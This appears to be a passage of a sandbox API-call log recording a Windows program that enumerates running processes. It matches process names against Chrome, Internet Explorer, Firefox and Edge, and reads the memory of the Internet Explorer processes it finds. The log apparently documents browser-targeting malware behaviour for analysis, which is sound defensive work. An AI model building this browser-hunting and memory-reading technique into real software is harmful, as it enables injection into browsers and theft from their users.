	[0207.049] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0207.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.050] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.050] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0207.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3150
	[0207.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.050] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0207.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.051] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.051] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0207.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.051] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.051] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0207.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3154
	[0207.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.052] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0207.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.053] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.053] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0207.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.053] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.053] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0207.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0207.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0207.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3158
	[0207.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.055] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0207.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.055] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.056] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0207.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.057] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.057] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0207.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x315c
	[0207.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.058] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0207.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.058] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.058] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0207.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.059] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.059] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0207.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3160
	[0207.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.060] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0207.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.060] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.060] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0207.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.061] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.061] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0207.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3164
	[0207.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.062] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0207.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.062] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.063] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0207.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.063] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0207.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3168
	[0207.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.064] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0207.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.064] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.065] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0207.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.066] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.066] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0207.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x316c
	[0207.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.067] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0207.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.067] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.067] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0207.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.067] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.068] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0207.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3170
	[0207.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.068] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0207.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.069] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.069] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0207.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.070] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.070] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0207.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3174
	[0207.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.071] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0207.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.071] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.072] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0207.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.072] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.072] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0207.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3178
	[0207.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.073] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0207.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.073] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.074] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0207.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.074] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.074] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0207.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x317c
	[0207.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.075] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0207.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.075] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.076] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0207.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.076] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.076] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0207.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3180
	[0207.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.077] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0207.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.077] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.078] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0207.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.078] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0207.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3184
	[0207.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.079] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0207.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.080] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.081] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0207.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.081] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0207.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3188
	[0207.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.082] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0207.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.083] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.083] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0207.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.084] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.084] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0207.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x318c
	[0207.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.085] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0207.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.086] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.086] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0207.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.087] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0207.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3190
	[0207.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.088] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0207.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.089] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.089] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0207.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.089] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.090] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0207.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3194
	[0207.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.103] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0207.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.104] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0207.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.104] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0207.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.104] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.105] NtQueryInformationProcess (in: ProcessHandle=0x3194, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0207.105] ReadProcessMemory (in: hProcess=0x3194, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0207.105] ReadProcessMemory (in: hProcess=0x3194, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0207.105] ReadProcessMemory (in: hProcess=0x3194, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0207.105] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0207.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0207.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3198
	[0207.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.410] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0207.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.410] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0207.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.410] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0207.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.411] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.411] NtQueryInformationProcess (in: ProcessHandle=0x3198, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0207.411] ReadProcessMemory (in: hProcess=0x3198, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0207.411] ReadProcessMemory (in: hProcess=0x3198, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0207.411] ReadProcessMemory (in: hProcess=0x3198, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0207.411] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0207.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0207.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x319c
	[0207.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.412] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0207.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.412] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.413] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0207.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.413] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0207.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x31a0
	[0207.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.414] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0207.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.414] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.415] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0207.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.415] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x31a4
	[0207.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.416] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.416] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.417] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.417] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
